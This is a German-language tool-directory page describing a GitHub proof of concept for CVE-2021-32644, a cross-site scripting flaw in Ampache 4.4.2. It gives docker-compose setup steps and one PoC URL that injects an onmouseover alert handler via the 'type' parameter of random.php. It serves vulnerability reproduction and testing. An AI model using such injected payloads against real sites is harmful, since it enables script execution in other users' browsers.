Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
Tools/GitHubGitHub/dnr6419/cve-2021-32644
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-32644

Diese Schwachstelle ist eine XSS-Schwachstelle, die Ampache bis zu Versionen vor 4.4.3 betraf. https://nvd.nist.gov/vuln/detail/CVE-2021-32644

Installations- und Ausführungsreihenfolge

1. Ampache-Installation

Bitte führen Sie während der Installation das Portforwarding in der Datei docker-compose.yml durch. Die aktuell installierte Ampache-Version ist 4.4.2.

root@kitploit:~
 $docker-compose up  

2. Auf Amapache zugreifen

Navigieren Sie zu http://[web-server ip]:port/.

2. Auf Amapache zugreifen & mysql-Einstellung

Navigieren Sie zu http://[web-server ip]:port/. Richten Sie die mysql-Datenbank wie im folgenden Bild ein. image

3. PoC

Wenn Sie den folgenden PoC einfügen, können Sie sehen, dass die XSS-Schwachstelle ausgelöst wird.

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

Quelle

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

Tool herunterladen